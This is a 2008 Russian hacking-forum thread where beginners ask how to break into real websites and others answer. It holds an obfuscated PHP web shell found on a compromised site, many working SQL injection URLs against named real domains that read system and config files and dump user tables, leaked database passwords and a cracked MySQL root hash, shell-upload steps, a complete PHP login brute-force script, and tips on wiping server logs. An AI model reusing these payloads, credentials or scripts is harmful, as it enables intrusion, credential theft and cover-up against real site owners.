Просмотр полной версии : Ваши вопросы по уязвимостям.
Всё равно ничего не понимаю. Ну залил я shell.php.gif, вбил в адресную строку путь, нажал ентер и чего? Ничего не происходит и произойти не может, ведь тогда надо чтобы .gif-файлы воспринимались апачем как phpшные. А переименовывать расширения ajaxfilemanager не даёт.
Вот ещё, искал уязвимые сайты c ajaxfilemanager'ом и на одном из них в папке uploads увидел файлик 1.txt:
<?PHP $login = ""; $pass = ""; $md5_pass = ""; eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXefMcFUL5EXf/yqceii7e8n9JvOYE9t8sT8cs//cfWUXldLpKsQ2LCH7EcnuYdrqeqDHEDz+4uJYWH3YLflGUnDJ4 0DjU/AL1miwEJPpBWlsAxTrgB46jRW/00XpggW00yDI/H1kD7UqxI/3qjQZ4vz7HLsfNVW1BeQKiVH2VTrXtoiaKYdkT4o/p1E8W/n5eVhagV7GanBn0U7OCfD7zPbCQyO0N/QGtstthqJBia5QJsR6xCgkHpBo1kQMlLt6u++SBvtw5KSMwtG4 R2yctd0mBNrlB3QQo4aQKGRgRjTa0xYFw1vVM9ySOMd44sSrPe SG8JPyOyEpK+U0y8d4n2EzI9MDdnlMkLKQQ8ZIYPW3sF4lUFF9 gO8AjT5ceta4HM7HkZi7S2yoAAPLD8D7Pn4kD6t1EIkHYORMtJ BdqcseuvOO5HcoLJO4b5UENDkOEq25EeU3GFSPIGFBzJVwCzJ+ KG8VOSwioKtYkBfa475CUIwdsd2UCyyIjzNcV1Qd9O7V5LLYSN RQVmxHk58dAQsHToc5po9kwIqw/hW7jSjN7DOxqpycbxRsWryNR1Rk/zW9H0SJC6YuDooqAb74a+JoAsnsNw3RXTOYnEXyrUypwzGj1mF xn4joUYcBpPKZFnhZduMJ3N+iJGv0jxauM6oyrlDbzOteU/HxgXvt+oAkr1f10Y+5qUWycE6pwbQ8H7wXaNVwgSOR32uZqe04 M7our2o/LBaJAzymHcrv5fAck4wdz+3i0V+uKI0X0aPSSdkiL6Y6kX6oPg XzgZhzywXLbbWzgCbQU50FMMYZsMU3hMt8lTceW4tQybP1tleF 8AmARZ8SE4R3YLqauuSz8YMVcZAqlYIMDXrNTyTNxOVWUgtMii nhJN3ZVlU5/9uNqLIlwxvkKjJT5u8giHlZLEPr42p7lKCUnNyKhDtPtsLCEyn wLp9Q5o/0lEcX2R0PWtQMovxL2lXNi4JPC16wv8pTDt5qOxe3qji/MoJHDj0qiOIVNI1i8/yvN9O6CGCzKd6v7wn5OIdyk46ReFluKuqs4Id58NtSSzC/v/nyO5q/YQjtmH0j7xniAOr9EUrv0xLTydVtCB1z+7TMGAHY5KaM9o37W/GQ/frFJetfqlRGO6FSRTMm7ILSm35o5z4+v0mcf4KaHgKS5Y17eqq vD2mmN8NzteyplNd6WOwrQVK445J/y01lvAIH6lMiK+71uQ/k6M/hZSctkD8jEhizy8LiW5zRxFHFl1W9Ifg04kxfGUoKag8MxFI3K o8H3xfgPmkQY0NuF8A+EMvs5NJPfiajdJZ0cW5MOr/W6s6HB0Se1HGX25egxPln3ZgPGYTTiCmJf1rjs6jSqEXXXmJBh Mpsc2qEDo4/XN2oqJYOi96eaO77GFxsIrhmJYZNM8FVXFjDioh6frIMa6LJHd dnSw8iyjdP/jGafIjtHUqTkmneVvuPXxySKri/9nj+s8p2jqeN1P9GacySffJByBAJ2K7kOx3E3TMlvs+G/mKXLZX4gkx88oBBM4azy+KikrI3q23MqT+eB4D6Yi1ddZkNX7w YFce63KZ/ij0kiKA57Hz5YmNHbn8wB6jYiuA1St5kjuj1INkWGuO9Y55gN2 ba3KYccXbIySqxnok4havZPJ+1KTcDbXNSUpI3bFMVHka4AmmB P7WPCQcpntcvmK4Me5QNCTmo4Zbjmmnw/IJ6EzgirhU/
//.........................ВЫРЕЗАНО......... .................//
rV2dQtN498uRXwY64HCeR7Eom8nCZqkQdOsesDDJDkiO/2qAPFjmCCt/NtOW25X6lZSd+GEJdAIreMaLwl1uooZJIH9KhOsdOr9yWEt18K 7nuz8zUo4KFv1ozJHtKxggwGoA5bjfwOlz72oOlouJNV7s+hPl s5rCO5Byj8eGnAOOrUyCrzEVpF+cQUpMZ/NqCOvo1bw0oA6DL8PREp2ZpQ+q0s+A/i7Mj3LHkrzvhlg0PSF9I0XzCOnfOuoKr4rL0mIqrhUJVGvcyXW ifopA16M9qhm3X2/22yufpovnpXYbIANy24CsXoZ1f3Tpjezrdv3mhUeKRpeqdYiPY Co3Vf4Ld+UiH/Plpsl7Q0K7Yq1HvBSwCHw3hcJZvJ9DiN6kJd8GXWR8A0g6gN7e fyolFZmXJSkfJ4ij9uzIk5Fn0+lSuVovCgr1UW9umOF1rZVfue HA/r9+bW9futJj1ZETFtfo+lljEkrKNphM1vsYofR0nLNeISTcx8J B+CzvCtPbkQvCREz20jzOWmhyA7i568zaZRQTLfO1zS9vP34kM fb0ii5c+X5DkZvfWI3aIzo7w2zgBBe0pcyEAwf140DKTG2tU2+ VdCzI0EQCSltagkiugrm3k1ctsnnNIyilfDkQNlNND7qml51xk iT0d5Mukc17Bfs2DXdUn7Dj5qynymWRcvydcWUwnbOTvD9ABmS Dz4AF5FV9omxSL/GO2OYowPCYGfNXBVAg6DPa84jA7JJJ6O+QdUv51FR/1dnx89M8P6H7P1qgSq3fbEqwSKgC2OCB6Gds5T7dJIsm2wrS+Y/O19dCsltUVCNIAWIIgeFb//eeff/79z/8A')));//xek ?>
Походу уже кто-то залил туда шелл. Только я никак не могу понять, КАК же им воспользоваться? И что от него толку, если он с расширением .txt? Объясните пожалуйста новичку.
Red_Red1
27.10.2008, 10:39
2_gr34t
Воспользоваться можно через локальный инклуд. Тогда все равно какое расширение у файла. Если найдешь то указывай ЛОКАЛЬНЫЙ путь к шеллу - он выполнится.
Да и еще, ты сказал что нельзя лить файлы с расширением .php попробуй .htm или .html
Помогите плиз
скуль http://ktv-spb.ru/admin/aut.php?user='
http://ktv-spb.ru/admin/aut.php?user=-1'order+by+2/* показывает 2 столбца
http://ktv-spb.ru/admin/aut.php?user=-1'union+select+1,2/* неработает
http://ktv-spb.ru/admin/aut.php?user='or+ASCII(substring(version(),1,1))>1/* посимвольно тоже неполучается
Вот ещё, искал уязвимые сайты c ajaxfilemanager'ом и на одном из них в папке uploads увидел файлик 1.txt:
<?PHP $login = ""; $pass = ""; $md5_pass = ""; eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXefMcFUL5EXf/yqceii7e8n9JvOYE9t8sT8cs//cfWUXldLpKsQ2LCH7EcnuYdrqeqDHEDz+4uJYWH3YLflGUnDJ4 0DjU/AL1miwEJPpBWlsAxTrgB46jRW/00XpggW00yDI/H1kD7UqxI/3qjQZ4vz7HLsfNVW1BeQKiVH2VTrXtoiaKYdkT4o/p1E8W/n5eVhagV7GanBn0U7OCfD7zPbCQyO0N/QGtstthqJBia5QJsR6xCgkHpBo1kQMlLt6u++SBvtw5KSMwtG4 R2yctd0mBNrlB3QQo4aQKGRgRjTa0xYFw1vVM9ySOMd44sSrPe SG8JPyOyEpK+U0y8d4n2EzI9MDdnlMkLKQQ8ZIYPW3sF4lUFF9 gO8AjT5ceta4HM7HkZi7S2yoAAPLD8D7Pn4kD6t1EIkHYORMtJ BdqcseuvOO5HcoLJO4b5UENDkOEq25EeU3GFSPIGFBzJVwCzJ+ KG8VOSwioKtYkBfa475CUIwdsd2UCyyIjzNcV1Qd9O7V5LLYSN RQVmxHk58dAQsHToc5po9kwIqw/hW7jSjN7DOxqpycbxRsWryNR1Rk/zW9H0SJC6YuDooqAb74a+JoAsnsNw3RXTOYnEXyrUypwzGj1mF xn4joUYcBpPKZFnhZduMJ3N+iJGv0jxauM6oyrlDbzOteU/HxgXvt+oAkr1f10Y+5qUWycE6pwbQ8H7wXaNVwgSOR32uZqe04 M7our2o/LBaJAzymHcrv5fAck4wdz+3i0V+uKI0X0aPSSdkiL6Y6kX6oPg XzgZhzywXLbbWzgCbQU50FMMYZsMU3hMt8lTceW4tQybP1tleF 8AmARZ8SE4R3YLqauuSz8YMVcZAqlYIMDXrNTyTNxOVWUgtMii nhJN3ZVlU5/9uNqLIlwxvkKjJT5u8giHlZLEPr42p7lKCUnNyKhDtPtsLCEyn wLp9Q5o/0lEcX2R0PWtQMovxL2lXNi4JPC16wv8pTDt5qOxe3qji/MoJHDj0qiOIVNI1i8/yvN9O6CGCzKd6v7wn5OIdyk46ReFluKuqs4Id58NtSSzC/v/nyO5q/YQjtmH0j7xniAOr9EUrv0xLTydVtCB1z+7TMGAHY5KaM9o37W/GQ/frFJetfqlRGO6FSRTMm7ILSm35o5z4+v0mcf4KaHgKS5Y17eqq vD2mmN8NzteyplNd6WOwrQVK445J/y01lvAIH6lMiK+71uQ/k6M/hZSctkD8jEhizy8LiW5zRxFHFl1W9Ifg04kxfGUoKag8MxFI3K o8H3xfgPmkQY0NuF8A+EMvs5NJPfiajdJZ0cW5MOr/W6s6HB0Se1HGX25egxPln3ZgPGYTTiCmJf1rjs6jSqEXXXmJBh Mpsc2qEDo4/XN2oqJYOi96eaO77GFxsIrhmJYZNM8FVXFjDioh6frIMa6LJHd dnSw8iyjdP/jGafIjtHUqTkmneVvuPXxySKri/9nj+s8p2jqeN1P9GacySffJByBAJ2K7kOx3E3TMlvs+G/mKXLZX4gkx88oBBM4azy+KikrI3q23MqT+eB4D6Yi1ddZkNX7w YFce63KZ/ij0kiKA57Hz5YmNHbn8wB6jYiuA1St5kjuj1INkWGuO9Y55gN2 ba3KYccXbIySqxnok4havZPJ+1KTcDbXNSUpI3bFMVHka4AmmB P7WPCQcpntcvmK4Me5QNCTmo4Zbjmmnw/IJ6EzgirhU/
//.........................ВЫРЕЗАНО......... .................//
rV2dQtN498uRXwY64HCeR7Eom8nCZqkQdOsesDDJDkiO/2qAPFjmCCt/NtOW25X6lZSd+GEJdAIreMaLwl1uooZJIH9KhOsdOr9yWEt18K 7nuz8zUo4KFv1ozJHtKxggwGoA5bjfwOlz72oOlouJNV7s+hPl s5rCO5Byj8eGnAOOrUyCrzEVpF+cQUpMZ/NqCOvo1bw0oA6DL8PREp2ZpQ+q0s+A/i7Mj3LHkrzvhlg0PSF9I0XzCOnfOuoKr4rL0mIqrhUJVGvcyXW ifopA16M9qhm3X2/22yufpovnpXYbIANy24CsXoZ1f3Tpjezrdv3mhUeKRpeqdYiPY Co3Vf4Ld+UiH/Plpsl7Q0K7Yq1HvBSwCHw3hcJZvJ9DiN6kJd8GXWR8A0g6gN7e fyolFZmXJSkfJ4ij9uzIk5Fn0+lSuVovCgr1UW9umOF1rZVfue HA/r9+bW9futJj1ZETFtfo+lljEkrKNphM1vsYofR0nLNeISTcx8J B+CzvCtPbkQvCREz20jzOWmhyA7i568zaZRQTLfO1zS9vP34kM fb0ii5c+X5DkZvfWI3aIzo7w2zgBBe0pcyEAwf140DKTG2tU2+ VdCzI0EQCSltagkiugrm3k1ctsnnNIyilfDkQNlNND7qml51xk iT0d5Mukc17Bfs2DXdUn7Dj5qynymWRcvydcWUwnbOTvD9ABmS Dz4AF5FV9omxSL/GO2OYowPCYGfNXBVAg6DPa84jA7JJJ6O+QdUv51FR/1dnx89M8P6H7P1qgSq3fbEqwSKgC2OCB6Gds5T7dJIsm2wrS+Y/O19dCsltUVCNIAWIIgeFb//eeff/79z/8A')));//xek ?>
Походу уже кто-то залил туда шелл. Только я никак не могу понять, КАК же им воспользоваться? И что от него толку, если он с расширением .txt? Объясните пожалуйста новичку.
Тебе что ссылку дать на мои шелы? :D Прекрасно заливается ;)
мой деф http://ondamaxfilms.com/
Товарищи Античатовцы, есть серьезный вопрос: где админка сайта eastandard.net? :). Я замучался искать :(.
Товарищи Античатовцы, есть серьезный вопрос: где админка сайта eastandard.net? :). Я замучался искать :(.
_ttp://eastandard.net/cpanel
__tps://eastandard.net:2083/
цпанель подойдёт?
777DEMYAN777
30.10.2008, 01:07
Ребята помогите получить доступ в админку datalife engine, версии движка не знаю! За помощь с меня +
777DEMYAN777
http://milw0rm.com/search.php набираешь datalife
777DEMYAN777, https://forum.antichat.ru/thread52195.html
777DEMYAN777
30.10.2008, 11:13
Спасибо ребятки!!!
Demonboy
31.10.2008, 17:53
Помогите пожалуйста найти админку сайта http://www.mediaport.info а то я искал искал и нашел только директорию /admin/
Помогите пожалуйста найти админку сайта http://www.mediaport.info а то я искал искал и нашел только директорию /admin/
и то выдает ошибку :) ну раз нашел скуль (а она там есть+ раскрытие пути) может другие варианты рассмотришь? ;)
Demonboy
01.11.2008, 15:54
Какие например можеш что то посоветовать? А то я только начинающий....
короче глянул на твой сайтик...
http://www.mediaport.info/production.php?theme=-1'%20union%20select%201,2,3,4,5,LOAD_FILE('/'),7,8,9%20from%20mysql.user%20limit%200,1/*
тебя наверное порадует...
PS Если б не был таким ленивым, то сам бы покоырялся и тебе ничего не сказал :d
//пасс мускулистого рута брутится
Demonboy
02.11.2008, 02:16
Пасиб большое мне ещё учиться и учиться сам бы до такого не дошел бы))
beerhack
02.11.2008, 15:01
http://www.bis-el.kiev.ua/index.php?parent_id=0&part_id=1&article_id=-99999+union+select+1,2,3,4,load_file(0x2F6574632F7 06173737764),6,7,8,9,10,11+from+users/*
version():5.1.22-rc-log
- можно ли както здесь залить шелл?
- имея доступ на чтение файлов как можно узнать полный путь до www?
- при использованиии конструкции into outfile можно ли кодировать путь к файлу в хекс?
1)Там есть phpmyadmin через него можно залить шелл
читаем конфиг:
http://www.bis-el.kiev.ua/index.php?parent_id=0&part_id=1&article_id=-99999+union+select+1,2,3,4,load_file(0x2f686f6d652 f6b696e672f7075626c69635f68746d6c2f696e632f64625f6 d7973716c2e696e63),6,7,8,9,10,11+from+mysql.user/*
оттуда получаем логин/пароль к БД
var $User = "clever";
var $Password = "whitebear";
Идем в phpmyadmin
http://www.bis-el.kiev.ua/phpmyadm/
и льем шелл через into outfile
Путь: /home/king/public_html/
2)Путь там можно подобрать, т.к там фряха, а в ней через load_file можно читать содержимое дир
3)Путь к файлу в hex кодировать нельзя
сильно не пинайте если что не так) просто я только пробую искать xss
при поисковом запросе фразы "><script>alert()</script> на одном сайте имеем следующую ошибку:
на белом фоне красуется надпись
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
... почему спросил, просто много прошарил сайтов и только на этом впервые такая трабла.)
Это IIS сервер скорее всего, он ругается на все неугодные ему символы
Там скорее всего mod_security стоит, в фильтры которого попадают передаваемые данные
Кто подскажет это чтоза cms http://audiovkontakte.ru/
И где её взять?
какая еще cms?
там одна или пару страничек и самописный скрипт парсинга ссылок с вк.
все
какая еще cms?
там одна или пару страничек и самописный скрипт парсинга ссылок с вк.
все
А где такой рарс нарыть???
Помогите расковырять инъекцию:
http://www.terrorfreetomorrow.org/articlenav.php?id=-1+union+select+1,2,3,4,version(),6
Помогите расковырять инъекцию:
http://www.terrorfreetomorrow.org/articlenav.php?id=-1+union+select+1,2,3,4,version(),6
Вот тебе название таблиц
http://www.terrorfreetomorrow.org/articlenav.php?id=-1+union+select+1,2,3,4,table_name,6+from+informati on_schema.tables
А дальше уже сам ковыряй её!
Вобщем такая ситуация:
Есть сайт: http://www.xxx.com/news.php?type=16 (Выводит новость)
При запросе: http://www.xxx.com/news.php?type=17-1 (Выводдит ту же самую новость)
При запросе: http://www.xxx.com/news.php?type=17 (Выводдит "Новость не существует")
-------------------------------------------------------------
При запросе: http://www.xxxx.com/news.php?type=16+union+select+1,2,3,4,5/* (Выводдит "Новость не существует")
При запросе: http://www.xxxx.com/news.php?type=16+union+select+1,2,3,4/* (Выводдит новость с id 16)
При запросе: http://www.xxxx.com/news.php?type=16+union+select+1,version(),3,4/* (Выводдит новость с id 16)
Вобщем нет никаких ошибок( хотя SQL Inj присутствует ... что делать в такой ситуации ?
попробуй склеить union select с:
type=17'
type=-1
type=-1'
type=9999
Jokester
04.11.2008, 17:07
что делать в такой ситуации ? Читать статьи про скуль. :D
А что по твоему он должен выводить?
http://www.xxxx.com/news.php?type=-16+union+select+1,2,3,4/*
Вот так попробуй
При запросе: http://www.xxxx.com/news.php?type=16+union+select+1,version(),3,4/* (Выводдит новость с id 16)
А что по твоему он должен выводить?
Версию)
http://www.xxxx.com/news.php?type=-16+union+select+1,2,3,4/*
Вот так попробуй
Выводит новость с id 16
попробуй склеить union select с:
type=17'
type=-1
type=-1'
type=9999
Никаких ошибок нет(
Зачем тебе ошибки? Ты принтабельные поля ищи. source страницы покопай.
+union+select+111,222,333,444/* для удобства, и ищи.
http://www.xxxx.com/news.php?type=16+and+1=2+union+select+1,version(), 3,4/*
http://www.xxxx.com/news.php?type=16+union+select+1,version(),3,4+limi t+1,1/*
http://www.xxxx.com/news.php?type=16+union+select+1,version(),3,4/*
так ты никогда не увидишь версию, надо ставить несуществующию запись
Если
http://www.xxxx.com/news.php?type=-16+union+select+1,2,3,4/*
не помогает, попробуй так
http://www.xxxx.com/news.php?type=-16'+union+select+1,2,3,4/*
если и так не катит скидывай ссылку сюда или в пм
_Pantera_
04.11.2008, 19:13
Та бывает такое, что нет ниодного поля с выводом на экран.
попробуй вот так:
http://www.xxxx.com/news.php?type=16+and+ascii(lower(substring(version (),1,1)))=51
это будет значить, что mysql 3 версии
http://www.xxxx.com/news.php?type=16+and+ascii(lower(substring(version (),1,1)))=52
это будет значить, что mysql 4 версии
http://www.xxxx.com/news.php?type=16+and+ascii(lower(substring(version (),1,1)))=53
это будет значить, что mysql 5 версии
В одном из этих случаев не должно вылезти ошибки, если ее нету, то запрос к mysql true и можно сделать вывод о версии...
Если принтабельных полей нет-юзай подзапросы. Иначе никак.
Попробуй ещё так
http://www.xxxx.com/news.php?type=16+union+select+'-16+union+select+1,2,3,4'+limit+1,1/*
Или перегони в хекс, если кавычки экранируются\слэшируются.В ообще подобная двойная конструкция, внутри union select может сработать. Пробуй.
В одном из этих случаев не должно вылезти ошибки, если ее нету, то запрос к mysql true и можно сделать вывод о версии...
И не только вывод версии ... тем более если версия 5 можно сбрутить все необходимые таблицы и колонки .... а затем полноценный вывод из нужной нам таблицы...
то же самое и в версии 4ре .. только нам нужно перебрать стандартные значения табиц и колонок ...
То есть если вывод ошибок отключён, при правильном запросе должно показывать, то что мне нужно. так ?
Скинь ссылочку... авось помогу...
_Pantera_
04.11.2008, 21:04
И не только вывод версии ... тем более если версия 5 можно сбрутить все необходимые таблицы и колонки .... а затем полноценный вывод из нужной нам таблицы...
то же самое и в версии 4ре .. только нам нужно перебрать стандартные значения табиц и колонок ...
ну это понятно)))) я по посимвольному брутфорсу в мускуле 5 статью помню писал на ачате =) Только потом сам ее и удалил, если каму надо могу выложить
http://slil.ru/26301742 вот залил, надеюсь каму нить она поможет...
http://depositfiles.com/files/nq76bn4ca
http://www.sendspace.com/file/3snrub
_Pantera_
Перезалей на сэндспэйс плз.
Интересная статья, зря удалил)
Действительно хорошая статья. Удалял то зачем?
beerhack
05.11.2008, 20:12
http://www.sngboard.ru/index.php?id_categ=-99999+union+select+1,2,3,4,5,6,table_name,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+ from+information_schema.tables/*
Значит ситуация такая - есть куча табл с юзерами но доступ к ним и некоторым полям их запрещен, конструкции unhex(hex()), aes_de... не помогают. Зато есть доступ к mysql.user оттудова я стянул и сбрутил пасс рута.
ROOT:*85FD004275C6D61CD6CAD3DEC994E8E326F5AEF2(ncl mswpq)
Включен file_priv, можно читать диры сайта.
/home/www/htdocs/SNGBOARD/admin - нельзя прочитать
/home/www/phpmyadmin - нельзя прочитать
Пробовал залить шелл через into outfile в диру /home/www/htdocs/sngboard так как кавычки фильтруются юзал подзапросы но тоже безрезультатно:(
собсно вопросы:
- что можно сделать с рутом от мускуля?
- что можно найти интересного в дирах?
- и какже всетаки залить шелл?
***.com/index.php?pid=-1'+union+select+1,2,3,4,5,6,7--
Ошибку выводит
You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7--'' at line 1
Число столбцов определил "order by"
Что делать не представляю
помогите плиз! подобрать колонки
скуль: http://sport-life.ru/shop/index.php?section=1+union+select+version(),2,3,4,5 +from+users/*
которые нашёл: firstname, id, lastNamE, address, phone
Jokester
05.11.2008, 20:58
beerhack Доступ есть ко всем таблицам просто они в разных базах:
http://www.sngboard.ru/index.php?id_categ=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,tabl e_schema,table_name),8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27+from+information_sche ma.tables/*
И нужно писать их маленькими буквами :)
Вот напимер доступ к одной из них:
http://www.sngboard.ru/index.php?id_categ=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,user _login,user_pass),8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27+from+wordpress.wp_users/*
Ковычки экранируются, и значит через инъекцию ты шелл не зальёшь, пробуй через админку
@beerhack
что можно сделать с рутом от мускуля?
подключиться к мускулу, разумеется если сервер разрешает удаленные подключения (по умолчанию порт 3306). Или же воспользоваться phpmyadmin, если он установлен на удаленном сервере и ты знаешь путь до него
что можно найти интересного в дирах?
скрипт-аплоадер
- и какже всетаки залить шелл?
им же
Вот админка
http://www.sngboard.ru/Admin/
(надо с большой буквы).
2 hulk
Вот все колонки в этой таблице
email
id
firstname
lastname
password
phone
@diznt
Ошибку выводит
You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7--'' at line 1
Число столбцов определил "order by"
Что делать не представляю
/* пробовал? Если использовать --, то нужно так:
/index.php?pid=-1'+union+select+1,2,3,4,5,6,7--%20-
также пробуй #
/index.php?pid=-1'+union+select+1,2,3,4,5,6,7%23
Если он определил кол-во столбцов через --, то и в конструкции union+select юзается так же -- . Возможно двойной запрос? Хотя ошибка синтаксическая.
Попробуй подзапросы
+and+substring(version(),1,1)=5--
(4,3)
@beerhack
чтение дир возможно благодаря FreeBSD, юзай вот этот скрипт
http://www.blacktoad.info/releases/dir_parsing.txt
@jokester
И нужно писать их маленькими буквами
в MySQL регистр таблиц и колонок не имеет значения
Если он определил кол-во столбцов через --, то и в конструкции union+select юзается так же -- .
если использовать --, то для MySQL необходимо указывать -- с пробелом:
--%20
Jokester
05.11.2008, 21:26
']
@jokester
в MySQL регистр таблиц и колонок не имеет значения
Ты вместо того, что-бы написать это посмотрел-бы линк.
Я не говорил про mysql, я говорил про этот пример
Вот линки :
http://www.sngboard.ru/index.php?id_categ=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,user _login,user_pass),8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27+from+wordpress.WP_USERS/*
Table 'wordpress.WP_USERS' doesn't exist
http://www.sngboard.ru/index.php?id_categ=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,user _login,user_pass),8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27+from+wordpress.wp_users/*
вывод
']если использовать --, то для MySQL необходимо указывать -- с пробелом:
--%20
Почему это "необходимо"? Вообще ни разу не юзал --%20, у меня работает и "--" на ура.
http://dev.mysql.com/doc/refman/5.0/en/comments.html
http://dev.mysql.com/doc/refman/5.0/en/ansi-diff-comments.html
при добавлении коммента "><script>alert()</script> к фотке не одном из сайтов имеем сообщение:
Fatal error: Cannot redeclare class_mysql::$sql_login in /usr/local/www/worlds.ru/req/mysql.class on line 7
что это может быть?
ps/ сильно не пинать я только начинаю)
-------------EDIT---------------------
комменты и так не работают...
спс desTiny )
-------------EDIT---------------------
Imperou$
07.11.2008, 02:17
Как понять? При подборе столбцов через order by принтит стандартную ошибку
Unknown column '100' in 'order clause'
Но и при 1 пишет
Unknown column '1' in 'order clause'
Юнион селект эррорят.
Первый раз сталкиваюсь.
DimOnOID
07.11.2008, 02:40
Как понять? При подборе столбцов через order by принтит стандартную ошибку
Unknown column '100' in 'order clause'
Но и при 1 пишет
Unknown column '1' in 'order clause'
Юнион селект эррорят.
Первый раз сталкиваюсь.
ссылку в пм или сюда
Imperou$
07.11.2008, 03:19
Ушла в пм.
Imperou$: потому что ты, видимо, пишешь order by '1' вместо order by 1
NetSter, а так просто коммент добавляется, если без всяких скриптов и тп?
_Pantera_
07.11.2008, 10:55
Как понять? При подборе столбцов через order by принтит стандартную ошибку
Unknown column '100' in 'order clause'
Но и при 1 пишет
Unknown column '1' in 'order clause'
Юнион селект эррорят.
Первый раз сталкиваюсь.
Если сайт рабочий, и через какие либо праметры передаются значения в БД, то ИМХО в таблице есть хоть 1 столбцы! Возможно админ сделал фейковую скулю. Дай мне url я посмотрю...
Как понять? При подборе столбцов через order by принтит стандартную ошибку
Unknown column '100' in 'order clause'
Но и при 1 пишет
Unknown column '1' in 'order clause'
Юнион селект эррорят.
Первый раз сталкиваюсь.
А может используются несколько запросов с одинаковыми параметрами? И ни в том ни в другом случае запрос не получается правильным...
Imperou$
07.11.2008, 17:40
desTiny
Всё правильно пишу.
Просто вывода не было.
Разобрался,скуль в другом скрипте на этом сайте.
Большое спасибо DimOnOID
Народ я к примеру похекал сайт (через скуль) и хочу удалить логи (там же вроде при запросе в скуле, все записываеться в логи) при этом есть полный доступ к серверу! как это мне сделать?
_Pantera_
08.11.2008, 11:56
Народ я к примеру похекал сайт (через скуль) и хочу удалить логи (там же вроде при запросе в скуле, все записываеться в логи) при этом есть полный доступ к серверу! как это мне сделать?
Что б почистить логи можешь воспользоваться "ванишем", и у тебя обязательно должны быть права рута! иначе никак.....
_Pantera_ а по нормальному можно???
_Pantera_ а по нормальному можно???
У тебя нет доступа к логам апача. Только если ты пользователь с максимальными правами(в линуксе - root), ты можешь их почистить. Хз где лежат в твоем случае. Скорей всего на уровень выше от корня www-дирректории.
Есть отличные команды в никсах:
find и locate - вот и ищи логи.
А в Win серверах все еще проще,обычно они либо в logs,либо как писал ChaaK - на диру выше www.
Незнал где спросить, запостил сюда.
Нужно автоматически перебрать пароли по словарю на одном сайте через форму авторизации определенного пользователя Может кто-то подскажет способ, или подкинет скрипт?
truelamer
08.11.2008, 18:44
2samarin
wwwhack прога старая но принципы досихпор не поменялись так что юзай если капчи нет или ограничения на количество попыток
если не найдешь могу скинуть на почту
wwwhack с https не работает. Есть ли еще какие нибудь варианты?
_Pantera_
08.11.2008, 19:54
Незнал где спросить, запостил сюда.
Нужно автоматически перебрать пароли по словарю на одном сайте через форму авторизации определенного пользователя Может кто-то подскажет способ, или подкинет скрипт?
<?################Брутфорс Форм##################
///////////////////////----(c) nc.STRIEM----//////////////////////////
$filepas="file.txt" ; ///файл с данными для брута
$filegood="good.txt"; ///файл с подходящими паролями
$endifg=1; ///закончить при первом же найденом 1-да 0-нет
$iskl=array();
//////строки которых не должно быть в правельных страницах/////////
$iskl[0]="Неверный пароль";
//$iskl[1]="Неверная длина пароля!";
//$iskl[2]="ERROR";
//$iskl[3]="Ошибка";
//////////////////////////////////////////////////////////////////
$host="localhost"; ///хост
$script="/form.php"; ///скрипт
///////////////////////////////////////////////Передоваемый Header ///////////////////////////////////////////////////////
$header="POST http://$host$script HTTP/1.0\r\n";
$header.= "Host: $host\r\n";
$header.= "Content-Type: application/x-www-form-urlencoded\r\n";
//////Не обязательные параметры! но не всегда///
//$header.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\n";
//$header.="Accept-Language: ru\r\n";
//$header.= "Proxy-Connection: Keep-Alive\r\n";
//$header.= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425))\r\n";
//$header.="Referer: http://microsoft.com\r\n";
//$header.="Cookie: CREATED=nc.STRIEM\r\n";
####################################Сам брут#####################################
set_time_limit(0);
$fo=fopen($filepas,"r");
$kolvoporolei=0;
$timestart=time('U');
$fgo=fopen($filegood,"a");
echo "<h3><center>Мы брутили http://$host$script</center></h3>";
while(!feof($fo))
{/////////////////////////////////////////////
$fp = fsockopen("www.".$host, 80, $errno, $errstr, 30);
if (!$fp)
echo "$errstr ($errno)<br />\n";
else
{
$kolvoporolei++;
$dan=rtrim(fgets($fo)); /////берем данные из файла
$dannii=split(';',$dan);
$out=$header;
$zapr="login=$dannii[0]&password=$dannii[1]"; ////имена переменных и их значения сюда
$contleng=strlen($zapr);
$out.= "Content-Length: $contleng\r\n";
$out.= "Pragma: no-cache\r\n\r\n";
$out.= "$zapr\r\n\r\n";
fwrite($fp, $out);
$conte="";
while (!feof($fp))
$conte.=fgets($fp);
$est=1;
for($i=0;$i<sizeof($iskl);$i++)
if(strstr($conte, $iskl[$i]))
{
$est=0;
break;
}
/////может понадобиться при настройки///
//echo htmlspecialchars($conte); break;
/////////////////////////////////
if($est)
{
fwrite($fgo,$dannii[0].";".$dannii[1]."\n");
echo "<h3><tt>Найдено:".$dannii[0].";".$dannii[1]."</tt></h3>";
if($endifg)
break;
}
fclose($fp);
}
}//////////////////////////////////////////////////////////////////////////////////////////
fclose($fgo);
$time=time('U')-$timestart;
echo "<h1><center>Закончено</center></h1><br><h3><tt>Проверенно $kolvoporolei вариантов, за $time секунд!</tt></h3><br><h4 align=center><center><tt>©*nc.STRIEM<br>nc.striem@mail.ru</tt></center></h4>";
?>
как раскрыть пути в Zeus Web Server? ))
Всем здрасти....
Собственно сабж! Залил шелл(на сайт) и доступна тока командная строка виндувс, надо залить или стянуть какой либо файл! Когда пишу "ftp" в cmd то там просто пустая строка (не туда и не туда) вообщем я думаю не пашет команда(или я хз что).... Нужно стянуть файл (или залить) как это можно сделать (Ftp-глюки)
Только под своим ипом обязательно!!!!)
Какой шелл?
diznt
